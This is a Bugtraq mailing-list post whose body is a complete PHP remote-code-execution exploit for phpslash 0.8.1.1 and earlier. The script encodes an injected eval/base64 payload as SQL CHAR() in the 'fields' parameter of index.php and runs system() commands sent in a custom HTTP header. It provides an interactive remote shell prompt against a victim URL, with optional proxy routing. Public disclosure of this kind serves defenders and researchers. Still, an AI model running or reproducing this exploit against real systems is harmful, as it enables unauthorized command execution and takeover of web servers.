phpslash <= 0.8.1.1 Remote Code Execution Exploit

From: gmdarkfig@gmail.com
To: bugtraq@securityfocus.com
Cc:
Subject: phpslash <= 0.8.1.1 Remote Code Execution Exploit
Date:


#!/usr/bin/php -q
<?php
#
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
##################################################
#
# phpslash <= 0.8.1.1 Remote Code Execution Exploit
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# RCE with no special rights (guest).
# No special PHP conditions required.
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# #0 It was a private sploit, but I decided to publish
# it #1 You did the fag on that one bro, it will not happen
# again =). #2 Don't try to use it on hzv, I helped them
# to patch this one before I publish it =)
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# Exploitation steps:
# 1 - include/class/tz_functions.inc tz_strftime()
# 2 - include/class/tz_functions.inc tz_generic()
# 3 - include/tz_env.class           generic()
#
error_reporting( E_ALL ^ E_NOTICE );
require('phpsploitclass.php');

// Main function
function main()
{
        // :)
 $web = new phpsploit();
       $web->agent( 'Mozilla Firefox' );

    // Hey ya :)
  head();

     // Target
     $url = get_p( 'url', true );
        
      // Proxy options
      $prh = get_p( 'proxhost' );
 $pra = get_p( 'proxauth' );

       // Use a proxy ?
      if( $prh )
    {
             // host:ip
            $web->proxy( $prh );
             
              // Authentication
             if( $pra )
            $web->proxyauth( $pra );
 }
     
      // Single quote bypass
        $byp = "1');";

       // PHP code
   $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';

    // Separator
  $s_sep = md5( rand( 0, 1000000000 ) . 'HEY_YA' );
   $c_sep = "print('$s_sep');";

    // Final PHP code
     $final = $byp . $c_sep  . $php . $c_sep  . 'exit();//';

   // Welcome guess !
    while( ($cmd = cmd_prompt()) !== false )
      {
             // magic_quotes_gpc bypass
            $web->addheader( 'MypCode', base64_encode( 'system("' . add_slashes($cmd) . '");' ) );
   
              // Go =]
              $web->get( $url . 'index.php?fields=' . to_char( $final ) . ',1' );

                // Result
             $res = explode( $s_sep, $web->getcontent() );

          // Erf 
               if( !isset( $res[1] ) )
               {
                     print "\nFailed";
                   exit(1);
              }
             // Cool
               else
          {
                     if( empty( $res[1] ) )
                        print "\nNo output: system() disabled OR cmd failed OR cmd without output";
                 
                      else
                  print "\n" . $res[1];
               }
     }
     
      return;
}

// No more bug with " and $
function add_slashes( $str )
{
       return str_replace( '$', '\\$', addslashes( $str ) );
}

// Command prompt
function cmd_prompt()
{
   print "\nshell>";

    $cmd = trim( fgets( STDIN ) );
        
      // Wanna stop =( ?
    if( in_array( strtolower( $cmd ) , array( 'exit', 'quit' ) ) )
    return false;
 
      else 
 return $cmd;
}

// MySQL CHAR() encoding
function to_char( $data )
{
     $chars = 'CHAR(';
   $len   = strlen( $data );
     
      for( $i = 0; $i < $len; $i++ )
   {
             $chars .= ord( $data[ $i ] );
         
              if( $i != $len-1 )
            $chars .= ',';
      }
     
      return $chars . ')';
}

// CLI params
function get_p( $p, $exit = false )
{
    foreach( $_SERVER['argv'] as $key => $value )
  {
             if( $value === '-' . $p )
           {
                     if( isset( $_SERVER['argv'][ $key+1 ] ) &&
                           !empty( $_SERVER['argv'][ $key+1 ] ) )
                   {                                       
                              return $_SERVER['argv'][ $key+1 ];
                  }
                     else
                  {
                             if( $exit )
                           usage();
                                      
                              return true;
                  }
             }
     }
             
      if( $exit )
   usage();
              
      return false;
}
      
// Headers =)
function head()
{
   print "\nphpslash <= 0.8.1.1 Remote Code Execution Exploit\n";
 print "-------------------------------------------------\n\n";
      print " About: \n";
 print "  by DarkFig  < gmdarkfig (at) gmail (dot) com >\n";
       print "  http://acid-root.new.fr/\n";
       print "  #acidroot@irc.worldnet.net\n\n";
   
      return;
}

// Usage, can help..
function usage()
{
       print " Usage:\n";
  print "  php spl.php -url <website> [options]\n\n";
       print " Example:\n";
        print "  php spl.php -url http://victim.com/\n\n";
  print " Options:\n";
        print "  -proxhost <ip:port> if you wanna use a proxy\n";
 print "  -proxauth <usr:pwd> proxy with authentication\n";
        
      exit(0);
}

// Run baby
main();

?>





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.